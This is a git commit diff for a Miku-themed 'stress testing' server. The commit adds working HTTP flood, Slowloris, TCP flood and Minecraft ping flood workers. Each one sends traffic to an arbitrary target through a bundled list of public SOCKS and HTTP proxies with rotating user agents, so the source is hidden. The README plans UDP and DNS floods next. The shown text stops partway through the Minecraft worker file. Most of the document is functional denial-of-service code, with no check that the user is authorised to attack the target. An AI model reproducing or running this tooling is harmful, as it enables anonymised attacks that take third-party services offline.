feature: 🤺 better proxy parsing, added methods: slowloris, mc ping, tcp flood
This commit is contained in:
parent
dceb9dafc8
commit
e0f33c00cc
17 changed files with 634 additions and 114 deletions
22
README.md
22
README.md
|
@ -13,7 +13,10 @@ A fun and visually appealing stress testing server with a **Miku-themed** fronte
|
||||||
- 📊 **Live Stats**: Track the success and failure of each attack in real-time. See how many packets are sent and whether they succeed or fail.
|
- 📊 **Live Stats**: Track the success and failure of each attack in real-time. See how many packets are sent and whether they succeed or fail.
|
||||||
- 🖼️ **Aesthetic Design**: A visually cute interface to make your experience enjoyable. 🌸
|
- 🖼️ **Aesthetic Design**: A visually cute interface to make your experience enjoyable. 🌸
|
||||||
- 📡 **Attack Methods:**:
|
- 📡 **Attack Methods:**:
|
||||||
- `HTTP` - Send HTTP requests
|
- `HTTP Flood` - Send random HTTP requests
|
||||||
|
- `HTTP Slowloris` - Send HTTP requests and keep the connection open
|
||||||
|
- `Minecraft Ping` - Send Minecraft ping/motd requests
|
||||||
|
- `TCP Flood` - Send random TCP packets
|
||||||
|
|
||||||
## Setup 🛠️
|
## Setup 🛠️
|
||||||
|
|
||||||
|
@ -58,7 +61,7 @@ Make sure you have the following installed:
|
||||||
Once the server is up and running, you can interact with it via the frontend:
|
Once the server is up and running, you can interact with it via the frontend:
|
||||||
|
|
||||||
1. **Start Attack**:
|
1. **Start Attack**:
|
||||||
- Set up the attack parameters: target URL, attack method (HTTP, etc.), packet size, duration, and delay.
|
- Set up the attack parameters: target URL, attack method (HTTP Flood, Slowloris, TCP, etc...), packet size, duration, and delay.
|
||||||
- Press "Start Attack" to initiate the stress test.
|
- Press "Start Attack" to initiate the stress test.
|
||||||
|
|
||||||
2. **Stop Attack**:
|
2. **Stop Attack**:
|
||||||
|
@ -69,7 +72,7 @@ Once the server is up and running, you can interact with it via the frontend:
|
||||||
```json
|
```json
|
||||||
{
|
{
|
||||||
"target": "http://example.com",
|
"target": "http://example.com",
|
||||||
"attackMethod": "http",
|
"attackMethod": "http_flood",
|
||||||
"packetSize": 512,
|
"packetSize": 512,
|
||||||
"duration": 60,
|
"duration": 60,
|
||||||
"packetDelay": 500
|
"packetDelay": 500
|
||||||
|
@ -83,8 +86,6 @@ Each attack type is handled in a separate worker thread, ensuring that the main
|
||||||
## To-Do 📝
|
## To-Do 📝
|
||||||
|
|
||||||
- Add more attack methods:
|
- Add more attack methods:
|
||||||
- Minecraft 🎮
|
|
||||||
- TCP 💻
|
|
||||||
- UDP 🌐
|
- UDP 🌐
|
||||||
- DNS 📡
|
- DNS 📡
|
||||||
- And more! 🔥
|
- And more! 🔥
|
||||||
|
@ -107,12 +108,13 @@ For example:
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
const attackHandlers = {
|
const attackHandlers = {
|
||||||
http: "./workers/httpAttack.js",
|
http_flood: "./workers/httpFloodAttack.js",
|
||||||
minecraft: "./workers/minecraftAttack.js",
|
http_slowloris: "./workers/httpSlowlorisAttack.js",
|
||||||
udp: "./workers/udpAttack.js",
|
tcp_flood: "./workers/tcpFloodAttack.js",
|
||||||
tcp: "./workers/tcpAttack.js",
|
minecraft_ping: "./workers/minecraftPingAttack.js",
|
||||||
dns: "./workers/dnsAttack.js",
|
|
||||||
// Add more protocols as needed!
|
// Add more protocols as needed!
|
||||||
|
your_protocol: "./workers/yourProtocolAttack.js"
|
||||||
};
|
};
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
BIN
bun.lockb
BIN
bun.lockb
Binary file not shown.
|
@ -1,8 +1,3 @@
|
||||||
http://219.129.167.82:2222
|
|
||||||
http://165.232.129.150:80
|
|
||||||
http://103.86.109.38:80
|
|
||||||
http://8.219.97.248:80
|
|
||||||
http://103.49.202.252:80
|
|
||||||
socks4://199.58.184.97:4145
|
socks4://199.58.184.97:4145
|
||||||
socks4://192.111.139.163:19404
|
socks4://192.111.139.163:19404
|
||||||
socks4://199.187.210.54:4145
|
socks4://199.187.210.54:4145
|
||||||
|
|
|
@ -5,7 +5,7 @@
|
||||||
"type": "module",
|
"type": "module",
|
||||||
"scripts": {
|
"scripts": {
|
||||||
"dev": "concurrently --ks SIGKILL -n \"Client,Server\" \"npm run dev:client\" \"npm run dev:server\"",
|
"dev": "concurrently --ks SIGKILL -n \"Client,Server\" \"npm run dev:client\" \"npm run dev:server\"",
|
||||||
"dev:server": "node server/index.js",
|
"dev:server": "tsx watch server/",
|
||||||
"dev:client": "vite",
|
"dev:client": "vite",
|
||||||
"build": "vite build",
|
"build": "vite build",
|
||||||
"lint": "eslint .",
|
"lint": "eslint .",
|
||||||
|
@ -19,10 +19,13 @@
|
||||||
"react": "^18.3.1",
|
"react": "^18.3.1",
|
||||||
"react-dom": "^18.3.1",
|
"react-dom": "^18.3.1",
|
||||||
"socket.io": "^4.7.4",
|
"socket.io": "^4.7.4",
|
||||||
"socket.io-client": "^4.7.4"
|
"socket.io-client": "^4.7.4",
|
||||||
|
"socks-proxy-agent": "^8.0.5",
|
||||||
|
"tsx": "^4.19.2"
|
||||||
},
|
},
|
||||||
"devDependencies": {
|
"devDependencies": {
|
||||||
"@eslint/js": "^9.9.1",
|
"@eslint/js": "^9.9.1",
|
||||||
|
"@types/express": "^5.0.0",
|
||||||
"@types/react": "^18.3.5",
|
"@types/react": "^18.3.5",
|
||||||
"@types/react-dom": "^18.3.0",
|
"@types/react-dom": "^18.3.0",
|
||||||
"@vitejs/plugin-react": "^4.3.1",
|
"@vitejs/plugin-react": "^4.3.1",
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
import fs from "fs";
|
import fs from "fs";
|
||||||
import { join } from "path";
|
import { join } from "path";
|
||||||
|
|
||||||
|
import { Proxy } from "./lib";
|
||||||
|
|
||||||
const currentPath = () => {
|
const currentPath = () => {
|
||||||
const path = process.cwd();
|
const path = process.cwd();
|
||||||
return path === "/" ? "." : path;
|
return path === "/" ? "." : path;
|
||||||
};
|
};
|
||||||
|
|
||||||
const loadFileLines = (filePath) => {
|
const loadFileLines = (filePath: string) => {
|
||||||
try {
|
try {
|
||||||
return fs
|
return fs
|
||||||
.readFileSync(filePath, "utf8")
|
.readFileSync(filePath, "utf8")
|
||||||
|
@ -24,11 +26,11 @@ export function loadUserAgents() {
|
||||||
return loadFileLines(join(currentPath(), "data/uas.txt"));
|
return loadFileLines(join(currentPath(), "data/uas.txt"));
|
||||||
}
|
}
|
||||||
|
|
||||||
export function loadProxies() {
|
export function loadProxies(): Proxy[] {
|
||||||
const lines = loadFileLines(join(currentPath(), "data/proxies.txt"));
|
const lines = loadFileLines(join(currentPath(), "data/proxies.txt"));
|
||||||
return lines.map((line) => {
|
return lines.map((line) => {
|
||||||
const [protocol, addr] = line.split("://");
|
const [protocol, addr] = line.split("://");
|
||||||
const [host, port] = addr.split(":");
|
const [host, port] = addr.split(":");
|
||||||
return { protocol, host, port };
|
return { protocol, host, port: parseInt(port) };
|
||||||
});
|
});
|
||||||
}
|
}
|
|
@ -5,12 +5,16 @@ import { Server } from "socket.io";
|
||||||
import { fileURLToPath } from "url";
|
import { fileURLToPath } from "url";
|
||||||
import { Worker } from "worker_threads";
|
import { Worker } from "worker_threads";
|
||||||
|
|
||||||
import { loadProxies, loadUserAgents } from "./utils/fileLoader.js";
|
import { loadProxies, loadUserAgents } from "./fileLoader";
|
||||||
import { filterProxies } from "./utils/proxyUtils.js";
|
import { AttackMethod } from "./lib";
|
||||||
|
import { filterProxies } from "./proxyUtils";
|
||||||
|
|
||||||
// Define the workers based on attack type
|
// Define the workers based on attack type
|
||||||
const attackWorkers = {
|
const attackWorkers: { [key in AttackMethod]: string } = {
|
||||||
http: "./workers/httpAttack.js",
|
http_flood: "./workers/httpFloodAttack.js",
|
||||||
|
http_slowloris: "./workers/httpSlowlorisAttack.js",
|
||||||
|
tcp_flood: "./workers/tcpFloodAttack.js",
|
||||||
|
minecraft_ping: "./workers/minecraftPingAttack.js",
|
||||||
};
|
};
|
||||||
|
|
||||||
const __filename = fileURLToPath(import.meta.url);
|
const __filename = fileURLToPath(import.meta.url);
|
||||||
|
@ -25,8 +29,8 @@ const io = new Server(httpServer, {
|
||||||
},
|
},
|
||||||
});
|
});
|
||||||
|
|
||||||
const proxies = loadProxies(join(__dirname, "../data/proxies.txt"));
|
const proxies = loadProxies();
|
||||||
const userAgents = loadUserAgents(join(__dirname, "../data/uas.txt"));
|
const userAgents = loadUserAgents();
|
||||||
|
|
||||||
console.log("Proxies loaded:", proxies.length);
|
console.log("Proxies loaded:", proxies.length);
|
||||||
console.log("User agents loaded:", userAgents.length);
|
console.log("User agents loaded:", userAgents.length);
|
||||||
|
@ -42,7 +46,7 @@ io.on("connection", (socket) => {
|
||||||
});
|
});
|
||||||
|
|
||||||
socket.on("startAttack", (params) => {
|
socket.on("startAttack", (params) => {
|
||||||
const { target, duration, packetDelay, attackMethod } = params;
|
const { target, duration, packetDelay, attackMethod, packetSize } = params;
|
||||||
const filteredProxies = filterProxies(proxies, attackMethod);
|
const filteredProxies = filterProxies(proxies, attackMethod);
|
||||||
const attackWorkerFile = attackWorkers[attackMethod];
|
const attackWorkerFile = attackWorkers[attackMethod];
|
||||||
|
|
||||||
|
@ -65,32 +69,37 @@ io.on("connection", (socket) => {
|
||||||
userAgents,
|
userAgents,
|
||||||
duration,
|
duration,
|
||||||
packetDelay,
|
packetDelay,
|
||||||
|
packetSize,
|
||||||
},
|
},
|
||||||
});
|
});
|
||||||
|
|
||||||
worker.on("message", (message) => socket.emit("stats", message));
|
worker.on("message", (message) => socket.emit("stats", message));
|
||||||
|
|
||||||
worker.on("error", (error) => {
|
worker.on("error", (error) => {
|
||||||
console.error(`Worker error: ${error.message}`);
|
console.error(`Worker error: ${error.message}`);
|
||||||
socket.emit("stats", { log: `❌ Worker error: ${error.message}` });
|
socket.emit("stats", { log: `❌ Worker error: ${error.message}` });
|
||||||
});
|
});
|
||||||
|
|
||||||
worker.on("exit", (code) => {
|
worker.on("exit", (code) => {
|
||||||
console.log(`Worker exited with code ${code}`);
|
console.log(`Worker exited with code ${code}`);
|
||||||
socket.emit("attackEnd");
|
socket.emit("attackEnd");
|
||||||
});
|
});
|
||||||
|
|
||||||
socket.worker = worker;
|
socket["worker"] = worker;
|
||||||
});
|
});
|
||||||
|
|
||||||
socket.on("stopAttack", () => {
|
socket.on("stopAttack", () => {
|
||||||
if (socket.worker) {
|
const worker = socket["worker"];
|
||||||
socket.worker.terminate();
|
if (worker) {
|
||||||
|
worker.terminate();
|
||||||
socket.emit("attackEnd");
|
socket.emit("attackEnd");
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
|
|
||||||
socket.on("disconnect", () => {
|
socket.on("disconnect", () => {
|
||||||
if (socket.worker) {
|
const worker = socket["worker"];
|
||||||
socket.worker.terminate();
|
if (worker) {
|
||||||
|
worker.terminate();
|
||||||
}
|
}
|
||||||
console.log("Client disconnected");
|
console.log("Client disconnected");
|
||||||
});
|
});
|
13
server/lib.ts
Normal file
13
server/lib.ts
Normal file
|
@ -0,0 +1,13 @@
|
||||||
|
export type ProxyProtocol = "http" | "https" | "socks4" | "socks5" | string;
|
||||||
|
|
||||||
|
export interface Proxy {
|
||||||
|
protocol: ProxyProtocol;
|
||||||
|
host: string;
|
||||||
|
port: number;
|
||||||
|
}
|
||||||
|
|
||||||
|
export type AttackMethod =
|
||||||
|
| "http_flood"
|
||||||
|
| "http_slowloris"
|
||||||
|
| "tcp_flood"
|
||||||
|
| "minecraft_ping";
|
53
server/proxyUtils.ts
Normal file
53
server/proxyUtils.ts
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
import { AttackMethod, Proxy, ProxyProtocol } from "./lib";
|
||||||
|
|
||||||
|
const DEFAULT_HTTP_PORT = 8080;
|
||||||
|
const DEFAULT_PROTOCOL: ProxyProtocol = "http";
|
||||||
|
|
||||||
|
const COMMON_PORTS: { [port: number]: ProxyProtocol } = {
|
||||||
|
80: "http",
|
||||||
|
443: "https",
|
||||||
|
1080: "socks5",
|
||||||
|
1081: "socks4",
|
||||||
|
8080: "http",
|
||||||
|
8443: "https",
|
||||||
|
};
|
||||||
|
|
||||||
|
const METHODS: { [key in AttackMethod]: ProxyProtocol[] } = {
|
||||||
|
http_flood: ["http", "https", "socks4", "socks5"],
|
||||||
|
http_slowloris: ["socks4", "socks5"],
|
||||||
|
tcp_flood: ["socks4", "socks5"],
|
||||||
|
minecraft_ping: ["socks4", "socks5"],
|
||||||
|
};
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Attempts to infer the protocol based on the port.
|
||||||
|
*/
|
||||||
|
function inferProtocol(port: number | undefined): ProxyProtocol {
|
||||||
|
if (port !== undefined && COMMON_PORTS[port]) {
|
||||||
|
return COMMON_PORTS[port];
|
||||||
|
}
|
||||||
|
return DEFAULT_PROTOCOL;
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Ensures a proxy object is safe and normalized by adding default values if missing.
|
||||||
|
*/
|
||||||
|
function normalizeProxy(proxy: Proxy): Proxy {
|
||||||
|
const normalizedPort = proxy.port || DEFAULT_HTTP_PORT;
|
||||||
|
const normalizedProtocol = proxy.protocol || inferProtocol(normalizedPort);
|
||||||
|
|
||||||
|
return {
|
||||||
|
...proxy,
|
||||||
|
port: normalizedPort,
|
||||||
|
protocol: normalizedProtocol,
|
||||||
|
};
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Filters proxies based on the attack method and ensures safe parsing of proxies.
|
||||||
|
*/
|
||||||
|
export function filterProxies(proxies: Proxy[], method: AttackMethod): Proxy[] {
|
||||||
|
return proxies
|
||||||
|
.map(normalizeProxy)
|
||||||
|
.filter((proxy) => METHODS[method].includes(proxy.protocol));
|
||||||
|
}
|
177
server/utils/mcUtils.js
Normal file
177
server/utils/mcUtils.js
Normal file
|
@ -0,0 +1,177 @@
|
||||||
|
// Adapted from: https://github.com/Cryptkeeper/mcping-js/
|
||||||
|
import net from "net";
|
||||||
|
import { SocksProxyAgent } from "socks-proxy-agent";
|
||||||
|
|
||||||
|
class MinecraftProtocol {
|
||||||
|
static writeVarInt(val) {
|
||||||
|
// "VarInts are never longer than 5 bytes"
|
||||||
|
// https://wiki.vg/Data_types#VarInt_and_VarLong
|
||||||
|
const buf = Buffer.alloc(5);
|
||||||
|
let written = 0;
|
||||||
|
|
||||||
|
while (true) {
|
||||||
|
if ((val & 0xffffff80) === 0) {
|
||||||
|
buf.writeUInt8(val, written++);
|
||||||
|
break;
|
||||||
|
} else {
|
||||||
|
buf.writeUInt8((val & 0x7f) | 0x80, written++);
|
||||||
|
val >>>= 7;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return buf.slice(0, written);
|
||||||
|
}
|
||||||
|
|
||||||
|
static writeString(val) {
|
||||||
|
return Buffer.from(val, "UTF-8");
|
||||||
|
}
|
||||||
|
|
||||||
|
static writeUShort(val) {
|
||||||
|
return Buffer.from([val >> 8, val & 0xff]);
|
||||||
|
}
|
||||||
|
|
||||||
|
static concat(chunks) {
|
||||||
|
let length = 0;
|
||||||
|
|
||||||
|
for (const chunk of chunks) {
|
||||||
|
length += chunk.length;
|
||||||
|
}
|
||||||
|
|
||||||
|
const buf = [MinecraftProtocol.writeVarInt(length), ...chunks];
|
||||||
|
|
||||||
|
return Buffer.concat(buf);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
class MinecraftBufferReader {
|
||||||
|
constructor(buffer) {
|
||||||
|
this._buffer = buffer;
|
||||||
|
this._offset = 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
readVarInt() {
|
||||||
|
let val = 0;
|
||||||
|
let count = 0;
|
||||||
|
|
||||||
|
while (true) {
|
||||||
|
const b = this._buffer.readUInt8(this._offset++);
|
||||||
|
|
||||||
|
val |= (b & 0x7f) << (count++ * 7);
|
||||||
|
|
||||||
|
if ((b & 0x80) != 128) {
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return val;
|
||||||
|
}
|
||||||
|
|
||||||
|
readString() {
|
||||||
|
const length = this.readVarInt();
|
||||||
|
const val = this._buffer.toString(
|
||||||
|
"UTF-8",
|
||||||
|
this._offset,
|
||||||
|
this._offset + length
|
||||||
|
);
|
||||||
|
|
||||||
|
// Advance the reader index forward by the string length
|
||||||
|
this._offset += length;
|
||||||
|
|
||||||
|
return val;
|
||||||
|
}
|
||||||
|
|
||||||
|
offset() {
|
||||||
|
return this._offset;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
export function pingMinecraftServer(host, port, proxy) {
|
||||||
|
return new Promise((resolve, reject) => {
|
||||||
|
const { protocol, host: proxyHost, port: proxyPort } = proxy;
|
||||||
|
|
||||||
|
const agent = new SocksProxyAgent(
|
||||||
|
`${protocol}://${proxyHost}:${proxyPort}`
|
||||||
|
);
|
||||||
|
|
||||||
|
const socket = net.createConnection({
|
||||||
|
host: host,
|
||||||
|
port: port,
|
||||||
|
agent: agent,
|
||||||
|
});
|
||||||
|
|
||||||
|
const timeoutTask = setTimeout(() => {
|
||||||
|
socket.emit("error", new Error("Socket timeout"));
|
||||||
|
}, 5000);
|
||||||
|
|
||||||
|
const closeSocket = () => {
|
||||||
|
socket.destroy();
|
||||||
|
clearTimeout(timeoutTask);
|
||||||
|
};
|
||||||
|
|
||||||
|
let didFireError = false;
|
||||||
|
|
||||||
|
const handleErr = (err) => {
|
||||||
|
closeSocket();
|
||||||
|
if (!didFireError) {
|
||||||
|
didFireError = true;
|
||||||
|
reject(err);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
socket.setNoDelay(true);
|
||||||
|
|
||||||
|
socket.on("connect", () => {
|
||||||
|
const handshake = MinecraftProtocol.concat([
|
||||||
|
MinecraftProtocol.writeVarInt(0),
|
||||||
|
MinecraftProtocol.writeVarInt(340),
|
||||||
|
MinecraftProtocol.writeVarInt(host.length),
|
||||||
|
MinecraftProtocol.writeString(host),
|
||||||
|
MinecraftProtocol.writeUShort(port),
|
||||||
|
MinecraftProtocol.writeVarInt(1),
|
||||||
|
]);
|
||||||
|
|
||||||
|
socket.write(handshake);
|
||||||
|
|
||||||
|
const request = MinecraftProtocol.concat([
|
||||||
|
MinecraftProtocol.writeVarInt(0),
|
||||||
|
]);
|
||||||
|
|
||||||
|
socket.write(request);
|
||||||
|
});
|
||||||
|
|
||||||
|
let incomingBuffer = Buffer.alloc(0);
|
||||||
|
|
||||||
|
socket.on("data", (data) => {
|
||||||
|
incomingBuffer = Buffer.concat([incomingBuffer, data]);
|
||||||
|
|
||||||
|
if (incomingBuffer.length < 5) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
const bufferReader = new MinecraftBufferReader(incomingBuffer);
|
||||||
|
const length = bufferReader.readVarInt();
|
||||||
|
|
||||||
|
if (incomingBuffer.length - bufferReader.offset() < length) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
const id = bufferReader.readVarInt();
|
||||||
|
|
||||||
|
if (id === 0) {
|
||||||
|
const reply = bufferReader.readString();
|
||||||
|
|
||||||
|
try {
|
||||||
|
const message = JSON.parse(reply);
|
||||||
|
resolve(message);
|
||||||
|
closeSocket();
|
||||||
|
} catch (err) {
|
||||||
|
handleErr(err);
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
handleErr(new Error("Received unexpected packet"));
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
socket.on("error", handleErr);
|
||||||
|
});
|
||||||
|
}
|
|
@ -1,9 +0,0 @@
|
||||||
const METHODS = {
|
|
||||||
http: ["http", "https"],
|
|
||||||
tcp: ["socks4", "socks5"],
|
|
||||||
udp: ["socks4", "socks5"],
|
|
||||||
};
|
|
||||||
|
|
||||||
export function filterProxies(proxies, method) {
|
|
||||||
return proxies.filter((proxy) => METHODS[method].includes(proxy.protocol));
|
|
||||||
}
|
|
18
server/utils/randomUtils.js
Normal file
18
server/utils/randomUtils.js
Normal file
|
@ -0,0 +1,18 @@
|
||||||
|
export function randomBoolean() {
|
||||||
|
return Math.random() < 0.5;
|
||||||
|
}
|
||||||
|
|
||||||
|
export function randomString(length) {
|
||||||
|
let result = "";
|
||||||
|
const characters =
|
||||||
|
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
|
||||||
|
const charactersLength = characters.length;
|
||||||
|
for (let i = 0; i < length; i++) {
|
||||||
|
result += characters.charAt(Math.floor(Math.random() * charactersLength));
|
||||||
|
}
|
||||||
|
return result;
|
||||||
|
}
|
||||||
|
|
||||||
|
export function randomInteger(min, max) {
|
||||||
|
return Math.floor(Math.random() * (max - min + 1)) + min;
|
||||||
|
}
|
|
@ -1,49 +0,0 @@
|
||||||
import axios from "axios";
|
|
||||||
import { parentPort, workerData } from "worker_threads";
|
|
||||||
|
|
||||||
const startAttack = () => {
|
|
||||||
const { target, proxies, userAgents, duration, packetDelay } = workerData;
|
|
||||||
|
|
||||||
let fixedTarget = target.startsWith("http") ? target : `http://${target}`;
|
|
||||||
let totalPackets = 0;
|
|
||||||
const startTime = Date.now();
|
|
||||||
|
|
||||||
const sendRequest = async (proxy, userAgent) => {
|
|
||||||
try {
|
|
||||||
await axios.get(fixedTarget, {
|
|
||||||
proxy: { host: proxy.host, port: proxy.port },
|
|
||||||
headers: { "User-Agent": userAgent },
|
|
||||||
timeout: 2000,
|
|
||||||
});
|
|
||||||
totalPackets++;
|
|
||||||
parentPort.postMessage({
|
|
||||||
log: `✅ Request successful from ${proxy.host}:${proxy.port} to ${fixedTarget}`,
|
|
||||||
totalPackets,
|
|
||||||
});
|
|
||||||
} catch (error) {
|
|
||||||
parentPort.postMessage({
|
|
||||||
log: `❌ Request failed from ${proxy.host}:${proxy.port} to ${fixedTarget}: ${error.message}`,
|
|
||||||
totalPackets,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
};
|
|
||||||
|
|
||||||
const interval = setInterval(() => {
|
|
||||||
const elapsedTime = (Date.now() - startTime) / 1000;
|
|
||||||
|
|
||||||
if (elapsedTime >= duration) {
|
|
||||||
clearInterval(interval);
|
|
||||||
parentPort.postMessage({ log: "Attack finished", totalPackets });
|
|
||||||
process.exit(0);
|
|
||||||
}
|
|
||||||
|
|
||||||
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
|
|
||||||
const userAgent = userAgents[Math.floor(Math.random() * userAgents.length)];
|
|
||||||
|
|
||||||
sendRequest(proxy, userAgent);
|
|
||||||
}, packetDelay);
|
|
||||||
};
|
|
||||||
|
|
||||||
if (workerData) {
|
|
||||||
startAttack();
|
|
||||||
}
|
|
76
server/workers/httpFloodAttack.js
Normal file
76
server/workers/httpFloodAttack.js
Normal file
|
@ -0,0 +1,76 @@
|
||||||
|
import axios from "axios";
|
||||||
|
import { SocksProxyAgent } from "socks-proxy-agent";
|
||||||
|
import { parentPort, workerData } from "worker_threads";
|
||||||
|
|
||||||
|
import { randomBoolean, randomString } from "../utils/randomUtils.js";
|
||||||
|
|
||||||
|
const startAttack = () => {
|
||||||
|
const { target, proxies, userAgents, duration, packetDelay, packetSize } =
|
||||||
|
workerData;
|
||||||
|
|
||||||
|
const fixedTarget = target.startsWith("http") ? target : `https://${target}`;
|
||||||
|
let totalPackets = 0;
|
||||||
|
const startTime = Date.now();
|
||||||
|
|
||||||
|
const sendRequest = async (proxy, userAgent) => {
|
||||||
|
try {
|
||||||
|
const config = {
|
||||||
|
headers: { "User-Agent": userAgent },
|
||||||
|
timeout: 2000,
|
||||||
|
validateStatus: (status) => {
|
||||||
|
return status < 500;
|
||||||
|
},
|
||||||
|
};
|
||||||
|
|
||||||
|
if (proxy.protocol === "http") {
|
||||||
|
config.proxy = {
|
||||||
|
host: proxy.host,
|
||||||
|
port: proxy.port,
|
||||||
|
};
|
||||||
|
} else if (proxy.protocol === "socks4" || proxy.protocol === "socks5") {
|
||||||
|
config.httpAgent = new SocksProxyAgent(
|
||||||
|
`${proxy.protocol}://${proxy.host}:${proxy.port}`
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
const isGet = packetSize > 64 ? false : randomBoolean();
|
||||||
|
const payload = randomString(packetSize);
|
||||||
|
|
||||||
|
if (isGet) {
|
||||||
|
await axios.get(`${fixedTarget}/${payload}`, config);
|
||||||
|
} else {
|
||||||
|
await axios.post(fixedTarget, payload, config);
|
||||||
|
}
|
||||||
|
|
||||||
|
totalPackets++;
|
||||||
|
parentPort.postMessage({
|
||||||
|
log: `✅ Request successful from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}`,
|
||||||
|
totalPackets,
|
||||||
|
});
|
||||||
|
} catch (error) {
|
||||||
|
parentPort.postMessage({
|
||||||
|
log: `❌ Request failed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}: ${error.message}`,
|
||||||
|
totalPackets,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
const interval = setInterval(() => {
|
||||||
|
const elapsedTime = (Date.now() - startTime) / 1000;
|
||||||
|
|
||||||
|
if (elapsedTime >= duration) {
|
||||||
|
clearInterval(interval);
|
||||||
|
parentPort.postMessage({ log: "Attack finished", totalPackets });
|
||||||
|
process.exit(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
|
||||||
|
const userAgent = userAgents[Math.floor(Math.random() * userAgents.length)];
|
||||||
|
|
||||||
|
sendRequest(proxy, userAgent);
|
||||||
|
}, packetDelay);
|
||||||
|
};
|
||||||
|
|
||||||
|
if (workerData) {
|
||||||
|
startAttack();
|
||||||
|
}
|
85
server/workers/httpSlowlorisAttack.js
Normal file
85
server/workers/httpSlowlorisAttack.js
Normal file
|
@ -0,0 +1,85 @@
|
||||||
|
import http from "http";
|
||||||
|
import { SocksProxyAgent } from "socks-proxy-agent";
|
||||||
|
import { parentPort, workerData } from "worker_threads";
|
||||||
|
|
||||||
|
import { randomString } from "../utils/randomUtils.js";
|
||||||
|
|
||||||
|
const startAttack = () => {
|
||||||
|
const { target, proxies, userAgents, duration, packetDelay, packetSize } =
|
||||||
|
workerData;
|
||||||
|
|
||||||
|
const fixedTarget = target.startsWith("http") ? target : `http://${target}`;
|
||||||
|
const protocolPort = target.startsWith("https") ? 443 : 80;
|
||||||
|
const targetPort = fixedTarget.includes(":")
|
||||||
|
? parseInt(fixedTarget.split(":")[2])
|
||||||
|
: protocolPort;
|
||||||
|
const targetHost = fixedTarget.replace(/^https?:\/\//, "");
|
||||||
|
|
||||||
|
let totalPackets = 0;
|
||||||
|
const startTime = Date.now();
|
||||||
|
|
||||||
|
const sendRequest = async (proxy, userAgent) => {
|
||||||
|
const options = {
|
||||||
|
hostname: targetHost,
|
||||||
|
port: targetPort,
|
||||||
|
path: "/",
|
||||||
|
method: "POST",
|
||||||
|
headers: {
|
||||||
|
"User-Agent": userAgent,
|
||||||
|
Connection: "keep-alive",
|
||||||
|
"Transfer-Encoding": "chunked",
|
||||||
|
Host: targetHost,
|
||||||
|
},
|
||||||
|
agent: new SocksProxyAgent(
|
||||||
|
`${proxy.protocol}://${proxy.host}:${proxy.port}`
|
||||||
|
),
|
||||||
|
};
|
||||||
|
|
||||||
|
const req = http.request(options, (res) => {
|
||||||
|
res.on("data", () => {});
|
||||||
|
res.on("end", () => {});
|
||||||
|
});
|
||||||
|
|
||||||
|
req.on("error", (err) => {
|
||||||
|
parentPort.postMessage({
|
||||||
|
log: `❌ Request failed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}: ${err.message}`,
|
||||||
|
totalPackets,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
req.on("close", () => {
|
||||||
|
parentPort.postMessage({
|
||||||
|
log: `⚠ Connection closed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}`,
|
||||||
|
totalPackets,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
const payload = randomString(packetSize);
|
||||||
|
req.write(payload);
|
||||||
|
|
||||||
|
totalPackets++;
|
||||||
|
parentPort.postMessage({
|
||||||
|
log: `✅ Request sent from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}`,
|
||||||
|
totalPackets,
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
const interval = setInterval(() => {
|
||||||
|
const elapsedTime = (Date.now() - startTime) / 1000;
|
||||||
|
|
||||||
|
if (elapsedTime >= duration) {
|
||||||
|
clearInterval(interval);
|
||||||
|
parentPort.postMessage({ log: "Attack finished", totalPackets });
|
||||||
|
process.exit(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
|
||||||
|
const userAgent = userAgents[Math.floor(Math.random() * userAgents.length)];
|
||||||
|
|
||||||
|
sendRequest(proxy, userAgent);
|
||||||
|
}, packetDelay);
|
||||||
|
};
|
||||||
|
|
||||||
|
if (workerData) {
|
||||||
|
startAttack();
|
||||||
|
}
|
49
server/workers/minecraftPingAttack.js
Normal file
49
server/workers/minecraftPingAttack.js
Normal file
|
@ -0,0 +1,49 @@
|
||||||
|
import { parentPort, workerData } from "worker_threads";
|
||||||
|
|
||||||
|
import { pingMinecraftServer } from "../utils/mcUtils.js";
|
||||||
|
|
||||||
|
const startAttack = () => {
|
||||||
|
const { target, proxies, duration, packetDelay } = workerData;
|
||||||
|
|
||||||
|
const [targetHost, targetPort] = target.split(":");
|
||||||
|
const parsedPort = parseInt(targetPort || "25565", 10);
|
||||||
|
const fixedTarget = `tcp://${targetHost}:${parsedPort}`;
|
||||||
|
|
||||||
|
let totalPackets = 0;
|
||||||
|
